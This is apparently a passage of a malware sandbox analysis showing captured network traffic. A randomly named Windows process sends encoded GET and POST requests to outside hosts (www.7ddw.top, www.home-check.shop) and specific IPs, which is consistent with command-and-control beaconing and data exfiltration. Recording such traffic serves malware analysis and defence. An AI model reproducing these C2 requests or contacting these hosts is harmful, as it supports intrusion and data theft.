                                                Data Ascii: suAArq50RVIJKlunnO5sHftZjAUlyAgcRD/Oy8MzHIG8qH1zcY05d9pQpVMSmufDbME88r8JdkDLOszW2n1zacS9UH1w9VGU1G4rpWXc4+L9ZHAtWnaHSiwDjMcQ9fF/Ur7Cfd/8zqNojxHUPIE/naNbqY4y5KPFSJBnC6beE5Wu+rkL4h9T4d9SxfRvrn8s9w+w7If1X2hAL1aUNZsUquDLfKxIS4OmQ0hFfBgQfZjpPCK94p6
                                                Aug 27, 2024 08:00:15.956067085 CEST5156OUTData Raw: 65 62 4c 4c 54 37 70 59 45 43 5a 75 45 4b 75 7a 48 34 78 42 71 31 79 6e 4d 30 55 4e 55 33 68 50 4c 48 58 33 7a 43 72 51 44 7a 4e 4c 65 4a 51 4f 6c 64 51 68 53 77 2f 4c 7a 59 2f 68 34 71 57 78 45 6b 70 63 76 31 73 41 46 39 50 47 73 7a 55 33 30 48
                                                Data Ascii: ebLLT7pYECZuEKuzH4xBq1ynM0UNU3hPLHX3zCrQDzNLeJQOldQhSw/LzY/h4qWxEkpcv1sAF9PGszU30HDsVu8qqOYJIGg17P6Gufvamz1Ei1bGqAmqP/yUuDIvQ1RWNZUh9KVROZZKGpZQvtQ8+FWd1zPdA3pOBhjyFmIn1vCcN3XrCyLyfkrnKVyP2gMIJgzg6R4kLQ6zjITpTISrvrxB7yrSdAql753wio5FZaUojjDCF7E
                                                Aug 27, 2024 08:00:15.956113100 CEST1289OUTData Raw: 37 72 47 4f 6e 68 65 78 7a 48 38 34 75 61 32 76 32 50 64 37 74 49 69 37 68 2b 72 69 37 77 76 77 4c 65 5a 74 2b 62 38 4a 45 72 64 5a 78 43 71 64 4f 41 45 57 6c 34 67 67 59 54 6d 73 38 32 33 68 7a 2f 53 74 6a 32 46 36 44 47 6c 41 4a 56 77 52 30 35
                                                Data Ascii: 7rGOnhexzH84ua2v2Pd7tIi7h+ri7wvwLeZt+b8JErdZxCqdOAEWl4ggYTms823hz/Stj2F6DGlAJVwR05UQV2Zv7fFKw/mFCpdM4vsa+wagMaO7kTyzP5fCetHW79JnjHDbDyP7XMGD7jKowbaeRlIWVxybJsm3Pdf5RA05pmf3GiOmv5g3ZJOH0IXUqa1V5A+tiRAlWoputAUxCj3ZNWUV6wy1X7D1//+6/25/02KDA2efmDv
                                                Aug 27, 2024 08:00:15.956453085 CEST5156OUTData Raw: 33 71 74 48 51 31 69 59 68 73 34 65 59 6d 30 74 35 63 44 52 76 61 47 36 4d 30 4b 48 65 71 31 75 50 73 32 65 4c 49 35 74 46 54 4e 6a 4e 45 36 64 35 6b 43 76 43 62 62 38 6a 73 6e 48 37 51 32 39 36 71 71 50 79 68 65 58 34 73 36 6e 6e 75 2f 56 6f 73
                                                Data Ascii: 3qtHQ1iYhs4eYm0t5cDRvaG6M0KHeq1uPs2eLI5tFTNjNE6d5kCvCbb8jsnH7Q296qqPyheX4s6nnu/Vos/p4o53is6JoFisdXjPN3JU67UK1q7he5hwh7N8Gu3RXswikzSqdnx1gPfYSWqokyW59SSmFCymziOL+4odKFQhBbT5RtZKBPoA4xJrKNiNI3iKAqPfTj9iOjmUrREoQEqQJplR2m3iIv6VT3mDinMBPj+5cyw0OXf
                                                Aug 27, 2024 08:00:15.956793070 CEST5156OUTData Raw: 35 51 50 74 48 36 77 30 4d 38 65 41 31 73 31 4b 44 6b 62 76 59 37 41 57 48 50 77 79 44 6e 2f 55 43 4d 30 65 2f 35 75 49 51 36 49 44 34 6c 75 74 2b 42 65 74 45 65 48 68 32 4a 67 31 47 4b 4b 34 47 5a 4b 48 31 79 79 69 58 39 39 51 46 6c 62 74 56 62
                                                Data Ascii: 5QPtH6w0M8eA1s1KDkbvY7AWHPwyDn/UCM0e/5uIQ6ID4lut+BetEeHh2Jg1GKK4GZKH1yyiX99QFlbtVbJnLo4bTtxnLvrK/MRS/xOpg6r0MdiZR6iXxTQmTNZtk0STq5YVf5zRHi6yS8NYlr5aXHO47emKevfCvgrTl9MUijt+Q+6e6aaItgoF66N0syGt6d/GxSXxlrZ1eQWe+wIb0FWfib85vGTaAsQOSwPCwYZ0yy7TUvz
                                                Aug 27, 2024 08:00:15.956964016 CEST7734OUTData Raw: 71 65 66 54 4f 75 71 66 72 2b 62 4f 62 4f 31 69 6e 48 61 6c 6b 45 59 54 6f 6f 2f 69 6a 64 69 76 6a 59 6e 56 65 6b 46 53 38 70 49 52 63 54 67 42 4c 4c 66 45 4a 70 72 7a 6c 4e 46 76 6e 73 50 53 41 61 7a 52 4c 6d 36 65 41 6e 6b 52 7a 47 2f 6c 63 4c
                                                Data Ascii: qefTOuqfr+bObO1inHalkEYToo/ijdivjYnVekFS8pIRcTgBLLfEJprzlNFvnsPSAazRLm6eAnkRzG/lcL/7b7FKOIWw+hGC9fQTWEZMNFjg1SXdfz0HN5LnAFJZaxhJu/RX1gpuBRTdrWgt0gLzolGAawcgJ25E6/DwpvpsHaLo49ukDkhJmUwets9HT0N7UFTKVLD46HJeT+9ZIIb80L6o3SXLZW9gKtEDPUhatImuzgFvaKp
                                                Aug 27, 2024 08:00:16.285933971 CEST1289OUTData Raw: 32 54 2b 4e 6f 38 5a 47 74 34 6d 6c 31 39 62 4f 68 4d 41 53 53 74 36 4d 75 6a 38 6c 35 33 79 62 5a 59 39 6d 50 59 50 6a 43 2b 39 64 76 41 6b 30 7a 79 73 68 46 61 54 42 61 79 79 6f 5a 6e 36 44 6e 63 4e 75 42 49 63 4e 75 30 6b 36 48 41 4b 74 66 59
                                                Data Ascii: 2T+No8ZGt4ml19bOhMASSt6Muj8l53ybZY9mPYPjC+9dvAk0zyshFaTBayyoZn6DncNuBIcNu0k6HAKtfY7JsFaqmJZq+NdMh5DDj5pHFtyj2fPSt9Iqk6QkL74Qf1SqJpPggzumBFj9fo/9KjHJp8T+jiOR8WF1nQYBl/POcs2OhzHRYAhj5cUdaKO31W3uBV2R20IESr0NFcbpr8xTR3xo7WVCX5HxBkILxLAXeTCMlSkbdqf
                                                Aug 27, 2024 08:00:16.285981894 CEST1289OUTData Raw: 58 63 67 41 6d 2f 6c 45 30 7a 35 76 62 50 53 79 41 58 51 4b 35 5a 52 48 4f 49 5a 47 4b 6f 74 6e 7a 66 32 43 31 58 51 65 4e 7a 6e 31 2f 4b 70 6a 51 54 46 2f 66 64 50 75 6a 65 7a 2f 62 73 54 46 4e 74 48 57 57 78 50 58 4d 67 4d 4c 51 35 76 6f 73 74
                                                Data Ascii: XcgAm/lE0z5vbPSyAXQK5ZRHOIZGKotnzf2C1XQeNzn1/KpjQTF/fdPujez/bsTFNtHWWxPXMgMLQ5vostYYMXXEkuGTNQStxYunvqfeGH36afH6oA8zhQycUTz3JlOlqTXSH5kSWNXlz0mMHQZMzlubhyaeev+0O/EznpRJQXH5SrBfcWwKHa56XJjzGI67qjvWLU2+ZcNfBtdJakmDkYRGblftu32wbdhlxGh/M4Fn9ETlG3P
                                                Aug 27, 2024 08:00:16.617058992 CEST312INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.11.2049873154.23.184.207807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:18.473742008 CEST542OUTGET /pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erb HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:18.796854973 CEST312INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.11.2049874185.230.15.3807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:24.168150902 CEST823OUTPOST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 32 4b 65 55 4c 75 67 6e 57 61 59 35 6f 66 61 59 42 59 61 56 50 61 6f 47 6a 59 6a 2f 35 71 2f 57 58 68 35 33 4b 55 70 4d 52 58 70 72 47 67 66 74 46 2f 76 61 2f 59 4d 65 54 42 39 70 44 68 6a 75 6b 7a 39 58 42 69 69 6a 6b 66 62 45 71 45 69 41 75 2f 4c 2b 57 39 6e 48 51 61 58 30 39 50 54 61 58 4b 58 75 54 65 7a 77 59 57 55 77 6f 43 6d 7a 4a 77 6a 77 69 63 34 65 4b 36 4c 73 6b 4b 43 70 30 66 55 6c 4e 37 36 45 39 34 73 63 6b 46 73 31 61 52 38 62 54 5a 30 46 37 37 54 44 59 44 43 5a 4e 74 75 67 4a 6e 46 39 73 72 52 6b 42 7a 71 54 73 71 51 7a 63 51 3d 3d
                                                Data Ascii: ij60MtY=Fl3Y1slJcSGC2KeULugnWaY5ofaYBYaVPaoGjYj/5q/WXh53KUpMRXprGgftF/va/YMeTB9pDhjukz9XBiijkfbEqEiAu/L+W9nHQaX09PTaXKXuTezwYWUwoCmzJwjwic4eK6LskKCp0fUlN76E94sckFs1aR8bTZ0F77TDYDCZNtugJnF9srRkBzqTsqQzcQ==
                                                Aug 27, 2024 08:00:24.459789038 CEST292INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                34192.168.11.2049875185.230.15.3807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:26.937452078 CEST1163OUTPOST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 77 65 69 55 4a 4a 30 6e 66 61 59 36 78 66 61 59 50 34 62 53 50 61 6b 47 6a 63 7a 76 2b 5a 58 57 58 41 4a 33 4c 57 42 4d 53 58 70 72 4a 41 65 70 47 50 76 6e 2f 59 52 6a 54 41 42 70 44 67 44 75 32 32 70 58 45 53 69 73 38 50 61 32 70 45 69 44 6b 66 4c 4f 57 39 71 75 51 59 72 30 39 66 76 61 46 38 6a 75 5a 72 50 7a 63 32 55 71 67 69 6d 30 41 51 6a 41 69 63 30 57 4b 37 7a 38 6a 38 4b 70 36 65 30 6c 4d 37 36 48 6f 59 73 6c 73 6c 74 4a 65 45 5a 66 56 61 41 61 2f 38 4b 5a 52 44 69 4f 47 64 6d 2f 48 47 4a 51 79 6f 4a 50 4b 41 79 4d 6f 4c 4d 37 49 55 4c 47 49 54 4c 58 79 4b 6e 32 78 44 50 72 76 58 79 77 66 61 6a 30 5a 6e 74 43 6b 51 4f 54 76 74 68 4a 69 67 70 41 2f 68 39 66 6a 31 65 53 4f 73 2b 39 71 65 48 68 6b 61 48 4c 43 30 66 53 35 31 6b 37 42 53 43 74 33 4d 4e 73 38 7a 54 75 38 56 74 53 66 35 6b 65 55 54 36 63 45 77 4f 65 64 5a 63 42 30 67 75 79 42 79 78 5a 34 4e 2b 63 77 65 62 67 57 41 43 6d 50 45 72 6b 2f 49 53 66 2b 54 5a 76 64 45 41 48 6e 75 [TRUNCATED]
                                                Data Ascii: ij60MtY=Fl3Y1slJcSGCweiUJJ0nfaY6xfaYP4bSPakGjczv+ZXWXAJ3LWBMSXprJAepGPvn/YRjTABpDgDu22pXESis8Pa2pEiDkfLOW9quQYr09fvaF8juZrPzc2Uqgim0AQjAic0WK7z8j8Kp6e0lM76HoYslsltJeEZfVaAa/8KZRDiOGdm/HGJQyoJPKAyMoLM7IULGITLXyKn2xDPrvXywfaj0ZntCkQOTvthJigpA/h9fj1eSOs+9qeHhkaHLC0fS51k7BSCt3MNs8zTu8VtSf5keUT6cEwOedZcB0guyByxZ4N+cwebgWACmPErk/ISf+TZvdEAHnuCMsFAXsQtz/EBDYFq8I7E/hLlPXzxyfhjYUiH1dWWSEJ4ZAzM1zL+6LMWmLtNVgPc8J5OHA0aSpSAF2RVgSUdtG0OTXLwJZ0bSc+NJWzWgx99HMfRjdJ5Kx9PHHUTT0rG2doNlRP36yynGxYgX8gqFTy6a5x/VXbhQGwzkO9LGQeyzu4x7+AmqK91I7xt4t/TvGR3/ygeFV5c=
                                                Aug 27, 2024 08:00:27.228481054 CEST292INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                35192.168.11.2049876185.230.15.3807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:29.703767061 CEST2578OUTPOST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 77 65 69 55 4a 4a 30 6e 66 61 59 36 78 66 61 59 50 34 62 53 50 61 6b 47 6a 63 7a 76 2b 5a 50 57 58 79 42 33 4b 33 42 4d 64 33 70 72 41 67 65 71 47 50 76 41 2f 59 4a 6e 54 41 4e 66 44 6b 7a 75 32 68 6c 58 44 67 61 73 70 2f 61 69 73 45 69 42 75 2f 4c 67 57 39 6e 35 51 59 76 4f 39 50 4c 61 58 50 72 75 54 34 6e 77 44 57 55 77 67 69 6d 67 45 51 6a 49 69 63 77 38 4b 37 50 38 6a 2b 2b 70 37 73 4d 6c 4a 71 36 48 38 34 73 69 31 31 74 47 4a 55 5a 32 56 61 55 30 2f 38 4c 73 52 47 61 4f 47 61 53 2f 45 42 39 66 78 49 4a 50 48 67 79 4e 35 62 41 33 49 56 6a 6b 49 51 58 58 79 49 6e 32 72 6a 50 72 35 6d 79 33 4c 71 6a 79 64 6e 74 76 79 51 54 51 76 73 45 77 69 69 6c 41 2f 56 56 66 69 45 65 53 43 74 2b 39 6b 65 48 6a 70 36 48 59 4a 55 66 34 35 31 31 53 42 53 69 58 33 50 68 73 38 52 62 75 70 42 5a 52 63 5a 6b 59 62 7a 37 59 41 31 57 61 64 5a 4d 64 30 67 75 69 42 7a 46 5a 34 39 75 63 7a 61 50 6a 56 51 43 68 47 6b 72 71 31 6f 57 56 2b 54 56 33 64 45 34 70 6e 75 [TRUNCATED]
                                                Data Ascii: ij60MtY=Fl3Y1slJcSGCweiUJJ0nfaY6xfaYP4bSPakGjczv+ZPWXyB3K3BMd3prAgeqGPvA/YJnTANfDkzu2hlXDgasp/aisEiBu/LgW9n5QYvO9PLaXPruT4nwDWUwgimgEQjIicw8K7P8j++p7sMlJq6H84si11tGJUZ2VaU0/8LsRGaOGaS/EB9fxIJPHgyN5bA3IVjkIQXXyIn2rjPr5my3LqjydntvyQTQvsEwiilA/VVfiEeSCt+9keHjp6HYJUf4511SBSiX3Phs8RbupBZRcZkYbz7YA1WadZMd0guiBzFZ49uczaPjVQChGkrq1oWV+TV3dE4pnu2MtlAXp3x0x0BEUlqxGbF9hLYeX2IPcQPYGiX1M2WRAp4jXjMJ3L+6LMayLtRVgek8ILGHFjOSvSAf2RU8SVhGG0GxXLAjZyDScqJJRyWh0N9CIfR0CZljx9TPHVvt0dS2csRlav35ninLmohUvwujTy2g5xLFXYhQEkymfvHOL+iAtM102muKD/xr/htqrozGaCDuiy7DB824lfsaTHJa1CRAguJ5817FryyECrgkcawAd6N2JkPcXvzA5V/xux915AymnZbTDS6VDWr4uEU7lMSahjRI/XvOzoNc6wrzzkdk/5+x7V7HouKRlk6OWNEla60tG6YewrQ2x8pj2nZPTKFeSk8pMZbTkQ6S+PFBl2l+BD2tBZQo4l2QkJBg8v/4GlvWLJZ3KU6wip/Xe5fSjOfBni5ep2eki/lxOkJOY19RBIMDpmg2ZVEVYAgUv4NmDrGHry8jSAC8tI+DKJoHam89ZSyEcXL7cLZWUBJOK4mpNkQE8T1WsXBIgS0ia28h22U2VGWg0nbQVZ2asRp6VlDoiYvIMCU8nxiummj4lpeYPdviHrta+voOxpTUNcMeTsxLl3sRsVwngreLtdTaT6yZSyRgIthNhfzCN9BkcY+vvDaAra9ydqoodmaUSoDPlYK6M5/ZKfcogUAPXLhEweM65kEUoOLX [TRUNCATED]
                                                Aug 27, 2024 08:00:29.703826904 CEST6445OUTData Raw: 32 78 31 4a 33 36 49 58 54 51 66 55 43 75 4c 43 45 65 42 52 37 36 33 62 64 46 51 51 63 78 37 64 64 53 4a 52 34 74 44 62 34 37 45 75 73 66 73 54 5a 49 68 52 74 77 52 6c 77 75 50 41 7a 68 65 43 2b 41 71 59 56 34 2f 50 38 6f 4b 56 5a 43 44 59 59 75
                                                Data Ascii: 2x1J36IXTQfUCuLCEeBR763bdFQQcx7ddSJR4tDb47EusfsTZIhRtwRlwuPAzheC+AqYV4/P8oKVZCDYYuGkIuJPECuWF0jha7FDCrk326RiaiCTBRquV1TK4rN5/k4VrTqVw26f5Tmgny5ho0oAVRu5wbRkOX2v6a6upoiNWwML3ic+5hzcXlx3fRemdCv2dGBhEW1E0zneuCjWvn2+GSoNSSBmsQaBtfgjLaMa++DS1GesgLI
                                                Aug 27, 2024 08:00:29.703881979 CEST3867OUTData Raw: 39 7a 4e 6f 5a 45 68 73 63 66 4e 50 32 72 34 65 53 5a 4d 72 43 31 2b 2b 45 66 73 61 44 54 76 44 72 44 6a 4e 6f 46 6f 75 7a 6e 69 4f 4a 51 31 76 37 36 54 70 73 75 4e 4f 30 78 76 65 43 73 38 49 2f 55 66 78 4c 4e 69 73 70 7a 69 53 67 4c 73 51 75 49
                                                Data Ascii: 9zNoZEhscfNP2r4eSZMrC1++EfsaDTvDrDjNoFouzniOJQ1v76TpsuNO0xveCs8I/UfxLNispziSgLsQuI5i7o47ytJOQnerYxVotzyQmNovLHuSDnLWSfk5g1niihleTPd2W5mzU7lxjc0WrCb/WZp0t2fzowikO5qQlOCmP25C5jM2SX91CGPkKt35rXjNOzcEAPEnoY5gUum/NFLtu4XNF+e/NoggoRrNnCGmTD3ZyD1vi9U
                                                Aug 27, 2024 08:00:29.943422079 CEST1289OUTData Raw: 4c 61 6e 6c 4d 6c 67 31 64 79 33 57 6a 75 4b 74 32 53 41 45 58 4e 41 73 61 63 4e 31 44 4c 35 4d 79 78 44 2f 75 39 31 72 48 46 7a 32 59 73 71 41 58 51 72 63 5a 52 57 6f 6b 32 68 70 2f 69 4e 75 48 66 37 2f 4d 44 4a 50 43 54 39 57 32 35 54 76 4b 4a
                                                Data Ascii: LanlMlg1dy3WjuKt2SAEXNAsacN1DL5MyxD/u91rHFz2YsqAXQrcZRWok2hp/iNuHf7/MDJPCT9W25TvKJ0KOCO3b/MWL/IkyDQqMzvUQ5bgp7XSrv4u6t8f7Nmfc5PdpnZ5C8IxBYNajtsMaY3f99w7Q08EGkYG9t28RZ1ERMzyD51EgHfN4dlSQQgpxQzrVTHpxrx5KgsqsqBWCMjtcJ4zYOaXW5dZQnJ6h2mSsUsQrwfez+O
                                                Aug 27, 2024 08:00:29.943471909 CEST1289OUTData Raw: 6c 43 73 6f 4d 77 45 45 74 66 50 49 4f 55 66 56 76 56 78 57 67 52 78 64 61 59 55 57 71 34 58 64 69 58 4d 66 44 41 74 4f 4a 45 56 52 39 51 66 50 75 46 74 62 57 79 59 63 69 65 45 62 4f 42 4a 4d 2f 47 5a 6d 47 51 4c 31 54 4f 44 68 69 43 75 43 73 63
                                                Data Ascii: lCsoMwEEtfPIOUfVvVxWgRxdaYUWq4XdiXMfDAtOJEVR9QfPuFtbWyYcieEbOBJM/GZmGQL1TODhiCuCscOhpPU4P/G6psFlFnY1Enh//ZXwBm0u8MI5hFhAlAF3FBe2NSBdSta7sMmsd92Hp2psLJa38gqw5mEUe17zDmtFECUWgakQucfVbnSpaQ0D9DsWjkJSCvbRDNbmeJe9Nklqc/9aqFDCDMAgCfK9AbZn4OS+gHQiSdR
                                                Aug 27, 2024 08:00:29.943640947 CEST1289OUTData Raw: 76 36 4e 48 72 73 48 30 39 30 72 75 55 6a 34 67 57 6d 36 4c 68 49 49 45 4f 67 55 35 65 41 50 4e 2b 31 45 46 5a 37 4a 75 77 75 49 71 65 50 45 37 43 6f 6d 69 4f 44 65 77 59 46 50 56 75 55 4e 7a 6e 77 79 64 71 6c 56 6c 55 64 62 4a 71 64 30 45 54 5a
                                                Data Ascii: v6NHrsH090ruUj4gWm6LhIIEOgU5eAPN+1EFZ7JuwuIqePE7ComiODewYFPVuUNznwydqlVlUdbJqd0ETZz/UahtrDRz3jJ+ZJiRYVsJ3g8QxhF458VxTegh4NU+z7waHsNdysuFyz+NcHIr+JNRA60nstIo1f1/4ucx3DWjhorRviNAm7rXcSHp5xLjTzx8HGN6dBp8hzrNPKP2DgNjU0Iw7b7dd0dbzpwggjzmSkvY57p8ZFK
                                                Aug 27, 2024 08:00:29.943813086 CEST3867OUTData Raw: 63 4d 50 4b 35 54 6e 79 46 66 6e 62 65 38 79 31 79 49 53 72 35 6e 4d 5a 6e 44 44 66 63 52 78 66 54 67 71 68 41 6c 65 6a 75 51 57 38 54 57 45 49 61 4c 4f 43 57 6a 37 79 6d 73 57 56 51 78 35 49 37 54 50 56 61 55 4a 58 7a 75 55 43 73 71 41 32 69 41
                                                Data Ascii: cMPK5TnyFfnbe8y1yISr5nMZnDDfcRxfTgqhAlejuQW8TWEIaLOCWj7ymsWVQx5I7TPVaUJXzuUCsqA2iAb5oa/rK/El6uQiSHoE7mFDvYcog2si7yW8nJey7brl4AP3QhoHBSuAPHKKJwOjNubT+7Nmk8/kT8dMmMCsHM+d9ECcusw6aR4xmxwZUCg4rHIgdaBt4K5qzwdGhOXXdL5TC288MqZrr0t5MVCEbpD/XmRUGBhW8uC
                                                Aug 27, 2024 08:00:29.943906069 CEST2578OUTData Raw: 76 4e 55 44 6d 4b 4a 73 38 4b 51 6d 4f 46 72 64 32 61 44 61 49 53 72 64 37 6b 69 48 63 34 56 79 32 6d 6b 6a 4b 54 57 36 63 78 66 36 42 51 45 35 44 69 66 77 31 77 31 69 52 74 68 37 35 75 76 30 70 4c 32 4a 36 4e 65 2f 2f 54 61 32 79 5a 71 74 6c 48
                                                Data Ascii: vNUDmKJs8KQmOFrd2aDaISrd7kiHc4Vy2mkjKTW6cxf6BQE5Difw1w1iRth75uv0pL2J6Ne//Ta2yZqtlHjcvJAS2MkYG4mtK0/WES8vR38Szt/l4sY9Whfxo3i3nMY128Q1mOrSD7lV712hLzLCFHMwsnIyOr5jM7e9hTHkf4UyNyFNOu9yT8BS1aiieN1n2DkzhzH9LSyAkzN6K3btDuBNCzo6VBaorUzFL1JBe7PkAnZTsd4
                                                Aug 27, 2024 08:00:29.944066048 CEST9023OUTData Raw: 31 4e 47 48 7a 56 78 43 30 37 44 37 46 53 38 35 32 74 6b 57 48 51 51 2f 4d 43 6e 31 4d 47 55 4d 61 6c 58 51 69 2f 71 74 2f 59 6a 46 4a 64 4f 63 52 69 58 71 4f 4d 32 79 31 36 44 31 58 63 51 6f 46 46 49 4b 77 4e 50 47 68 54 69 6c 32 61 6c 74 48 58
